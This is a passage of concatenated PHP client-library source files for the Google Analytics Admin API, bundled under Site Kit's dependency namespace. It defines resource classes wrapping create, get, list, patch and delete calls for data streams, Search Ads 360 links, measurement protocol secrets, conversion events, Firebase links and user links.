streams under the property with Id 123: * "properties/123" * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200; * (higher values will be coerced to the maximum) * @opt_param string pageToken A page token, received from a previous * `ListIosAppDataStreams` call. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to `ListIosAppDataStreams` * must match the call that provided the page token. * @return GoogleAnalyticsAdminV1alphaListIosAppDataStreamsResponse */ public function listPropertiesIosAppDataStreams($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListIosAppDataStreamsResponse::class); } /** * Updates an iOS app stream on a property. (iosAppDataStreams.patch) * * @param string $name Output only. Resource name of this Data Stream. Format: * properties/{property_id}/iosAppDataStreams/{stream_id} Example: * "properties/1000/iosAppDataStreams/2000" * @param GoogleAnalyticsAdminV1alphaIosAppDataStream $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Field names must be in snake case (e.g., "field_to_update"). Omitted fields * will not be updated. To replace the entire entity, use one path with the * string "*" to match all fields. * @return GoogleAnalyticsAdminV1alphaIosAppDataStream */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaIosAppDataStream $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaIosAppDataStream::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesIosAppDataStreams::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesIosAppDataStreams'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListSearchAds360LinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchAds360Link; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "searchAds360Links" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $searchAds360Links = $analyticsadminService->searchAds360Links; * </code> */ class PropertiesSearchAds360Links extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a SearchAds360Link. (searchAds360Links.create) * * @param string $parent Required. Example format: properties/1234 * @param GoogleAnalyticsAdminV1alphaSearchAds360Link $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaSearchAds360Link */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchAds360Link $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchAds360Link::class); } /** * Deletes a SearchAds360Link on a property. (searchAds360Links.delete) * * @param string $name Required. The name of the SearchAds360Link to delete. * Example format: properties/1234/SearchAds360Links/5678 * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Look up a single SearchAds360Link (searchAds360Links.get) * * @param string $name Required. The name of the SearchAds360Link to get. * Example format: properties/1234/SearchAds360Link/5678 * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaSearchAds360Link */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchAds360Link::class); } /** * Lists all SearchAds360Links on a property. * (searchAds360Links.listPropertiesSearchAds360Links) * * @param string $parent Required. Example format: properties/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200 * (higher values will be coerced to the maximum). * @opt_param string pageToken A page token, received from a previous * `ListSearchAds360Links` call. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to `ListSearchAds360Links` * must match the call that provided the page token. * @return GoogleAnalyticsAdminV1alphaListSearchAds360LinksResponse */ public function listPropertiesSearchAds360Links($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListSearchAds360LinksResponse::class); } /** * Updates a SearchAds360Link on a property. (searchAds360Links.patch) * * @param string $name Output only. The resource name for this SearchAds360Link * resource. Format: properties/{propertyId}/searchAds360Links/{linkId} Note: * linkId is not the Search Ads 360 advertiser ID * @param GoogleAnalyticsAdminV1alphaSearchAds360Link $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Omitted fields will not be updated. To replace the entire entity, use one * path with the string "*" to match all fields. * @return GoogleAnalyticsAdminV1alphaSearchAds360Link */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchAds360Link $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaSearchAds360Link::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesSearchAds360Links::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesSearchAds360Links'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "measurementProtocolSecrets" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $measurementProtocolSecrets = $analyticsadminService->measurementProtocolSecrets; * </code> */ class PropertiesIosAppDataStreamsMeasurementProtocolSecrets extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a measurement protocol secret. (measurementProtocolSecrets.create) * * @param string $parent Required. The parent resource where this secret will be * created. Any type of stream (WebDataStream, IosAppDataStream, * AndroidAppDataStream) may be a parent. Format: * properties/{property}/webDataStreams/{webDataStream} * @param GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class); } /** * Deletes target MeasurementProtocolSecret. (measurementProtocolSecrets.delete) * * @param string $name Required. The name of the MeasurementProtocolSecret to * delete. Format: properties/{property}/webDataStreams/{webDataStream}/measurem * entProtocolSecrets/{measurementProtocolSecret} Note: Any type of stream * (WebDataStream, IosAppDataStream, AndroidAppDataStream) may be a parent. * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lookup for a single "GA4" MeasurementProtocolSecret. * (measurementProtocolSecrets.get) * * @param string $name Required. The name of the measurement protocol secret to * lookup. Format: properties/{property}/webDataStreams/{webDataStream}/measurem * entProtocolSecrets/{measurementProtocolSecret} Note: Any type of stream * (WebDataStream, IosAppDataStream, AndroidAppDataStream) may be a parent. * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class); } /** * Returns child MeasurementProtocolSecrets under the specified parent Property. * (measurementProtocolSecrets.listPropertiesIosAppDataStreamsMeasurementProtoco * lSecrets) * * @param string $parent Required. The resource name of the parent stream. Any * type of stream (WebDataStream, IosAppDataStream, AndroidAppDataStream) may be * a parent. Format: properties/{property}/webDataStreams/{webDataStream}/measur * ementProtocolSecrets * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 10 resources will be returned. The maximum value is 10. * Higher values will be coerced to the maximum. * @opt_param string pageToken A page token, received from a previous * `ListMeasurementProtocolSecrets` call. Provide this to retrieve the * subsequent page. When paginating, all other parameters provided to * `ListMeasurementProtocolSecrets` must match the call that provided the page * token. * @return GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse */ public function listPropertiesIosAppDataStreamsMeasurementProtocolSecrets($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse::class); } /** * Updates a measurement protocol secret. (measurementProtocolSecrets.patch) * * @param string $name Output only. Resource name of this secret. This secret * may be a child of any type of stream. Format: properties/{property}/webDataSt * reams/{webDataStream}/measurementProtocolSecrets/{measurementProtocolSecret} * @param GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask The list of fields to be updated. Omitted fields * will not be updated. * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesIosAppDataStreamsMeasurementProtocolSecrets::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesIosAppDataStreamsMeasurementProtocolSecrets'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEvent; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListConversionEventsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "conversionEvents" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $conversionEvents = $analyticsadminService->properties_conversionEvents; * </code> */ class PropertiesConversionEvents extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a conversion event with the specified attributes. * (conversionEvents.create) * * @param string $parent Required. The resource name of the parent property * where this conversion event will be created. Format: properties/123 * @param GoogleAnalyticsAdminV1betaConversionEvent $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaConversionEvent * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEvent $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEvent::class); } /** * Deletes a conversion event in a property. (conversionEvents.delete) * * @param string $name Required. The resource name of the conversion event to * delete. Format: properties/{property}/conversionEvents/{conversion_event} * Example: "properties/123/conversionEvents/456" * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty * @throws \Google\Service\Exception */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Retrieve a single conversion event. (conversionEvents.get) * * @param string $name Required. The resource name of the conversion event to * retrieve. Format: properties/{property}/conversionEvents/{conversion_event} * Example: "properties/123/conversionEvents/456" * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaConversionEvent * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEvent::class); } /** * Returns a list of conversion events in the specified parent property. Returns * an empty list if no conversion events are found. * (conversionEvents.listPropertiesConversionEvents) * * @param string $parent Required. The resource name of the parent property. * Example: 'properties/123' * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200; * (higher values will be coerced to the maximum) * @opt_param string pageToken A page token, received from a previous * `ListConversionEvents` call. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to `ListConversionEvents` must * match the call that provided the page token. * @return GoogleAnalyticsAdminV1betaListConversionEventsResponse * @throws \Google\Service\Exception */ public function listPropertiesConversionEvents($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListConversionEventsResponse::class); } /** * Updates a conversion event with the specified attributes. * (conversionEvents.patch) * * @param string $name Output only. Resource name of this conversion event. * Format: properties/{property}/conversionEvents/{conversion_event} * @param GoogleAnalyticsAdminV1betaConversionEvent $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Field names must be in snake case (e.g., "field_to_update"). Omitted fields * will not be updated. To replace the entire entity, use one path with the * string "*" to match all fields. * @return GoogleAnalyticsAdminV1betaConversionEvent * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEvent $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEvent::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesConversionEvents::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesConversionEvents'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaFirebaseLink; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListFirebaseLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "firebaseLinks" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $firebaseLinks = $analyticsadminService->properties_firebaseLinks; * </code> */ class PropertiesFirebaseLinks extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a FirebaseLink. Properties can have at most one FirebaseLink. * (firebaseLinks.create) * * @param string $parent Required. Format: properties/{property_id} Example: * properties/1234 * @param GoogleAnalyticsAdminV1betaFirebaseLink $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaFirebaseLink * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaFirebaseLink $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaFirebaseLink::class); } /** * Deletes a FirebaseLink on a property (firebaseLinks.delete) * * @param string $name Required. Format: * properties/{property_id}/firebaseLinks/{firebase_link_id} Example: * properties/1234/firebaseLinks/5678 * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty * @throws \Google\Service\Exception */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lists FirebaseLinks on a property. Properties can have at most one * FirebaseLink. (firebaseLinks.listPropertiesFirebaseLinks) * * @param string $parent Required. Format: properties/{property_id} Example: * properties/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. The * service may return fewer than this value, even if there are additional pages. * If unspecified, at most 50 resources will be returned. The maximum value is * 200; (higher values will be coerced to the maximum) * @opt_param string pageToken A page token, received from a previous * `ListFirebaseLinks` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListFirebaseLinks` must match * the call that provided the page token. * @return GoogleAnalyticsAdminV1betaListFirebaseLinksResponse * @throws \Google\Service\Exception */ public function listPropertiesFirebaseLinks($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListFirebaseLinksResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesFirebaseLinks::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesFirebaseLinks'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLinksRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListUserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "userLinks" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $userLinks = $analyticsadminService->userLinks; * </code> */ class PropertiesUserLinks extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Lists all user links on an account or property, including implicit ones that * come from effective permissions granted by groups or organization admin * roles. If a returned user link does not have direct permissions, they cannot * be removed from the account or property directly with the DeleteUserLink * command. They have to be removed from the group/etc that gives them * permissions, which is currently only usable/discoverable in the GA or GMP * UIs. (userLinks.audit) * * @param string $parent Required. Example format: accounts/1234 * @param GoogleAnalyticsAdminV1alphaAuditUserLinksRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaAuditUserLinksResponse */ public function audit($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLinksRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('audit', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLinksResponse::class); } /** * Creates information about multiple users' links to an account or property. * This method is transactional. If any UserLink cannot be created, none of the * UserLinks will be created. (userLinks.batchCreate) * * @param string $parent Required. The account or property that all user links * in the request are for. This field is required. The parent field in the * CreateUserLinkRequest messages must either be empty or match this field. * Example format: accounts/1234 * @param GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse */ public function batchCreate($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchCreate', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse::class); } /** * Deletes information about multiple users' links to an account or property. * (userLinks.batchDelete) * * @param string $parent Required. The account or property that all user links * in the request are for. The parent of all values for user link names to * delete must match this field. Example format: accounts/1234 * @param GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest $postBody * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function batchDelete($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchDelete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Gets information about multiple users' links to an account or property. * (userLinks.batchGet) * * @param string $parent Required. The account or property that all user links * in the request are for. The parent of all provided values for the 'names' * field must match this field. Example format: accounts/1234 * @param array $optParams Optional parameters. * * @opt_param string names Required. The names of the user links to retrieve. A * maximum of 1000 user links can be retrieved in a batch. Format: * accounts/{accountId}/userLinks/{userLinkId} * @return GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse */ public function batchGet($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('batchGet', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse::class); } /** * Updates information about multiple users' links to an account or property. * (userLinks.batchUpdate) * * @param string $parent Required. The account or property that all user links * in the request are for. The parent field in the UpdateUserLinkRequest * messages must either be empty or match this field. Example format: * accounts/1234 * @param GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse */ public function batchUpdate($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchUpdate', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse::class); } /** * Creates a user link on an account or property. If the user with the specified * email already has permissions on the account or property, then the user's * existing permissions will be unioned with the permissions specified in the * new UserLink. (userLinks.create) * * @param string $parent Required. Example format: accounts/1234 * @param GoogleAnalyticsAdminV1alphaUserLink $postBody * @param array $optParams Optional parameters. * * @opt_param bool notifyNewUser Optional. If set, then email the new user * notifying them that they've been granted permissions to the resource. * @return GoogleAnalyticsAdminV1alphaUserLink */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class); } /** * Deletes a user link on an account or property. (userLinks.delete) * * @param string $name Required. Example format: accounts/1234/userLinks/5678 * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Gets information about a user's link to an account or property. * (userLinks.get) * * @param string $name Required. Example format: accounts/1234/userLinks/5678 * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaUserLink */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class); } /** * Lists all user links on an account or property. * (userLinks.listPropertiesUserLinks) * * @param string $parent Required. Example format: accounts/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of user links to return. The * service may return fewer than this value. If unspecified, at most 200 user * links will be returned. The maximum value is 500; values above 500 will be * coerced to 500. * @opt_param string pageToken A page token, received from a previous * `ListUserLinks` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListUserLinks` must match the * call that provided the page token. * @return GoogleAnalyticsAdminV1alphaListUserLinksResponse */ public function listPropertiesUserLinks($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListUserLinksResponse::class); } /** * Updates a user link on an account or property. 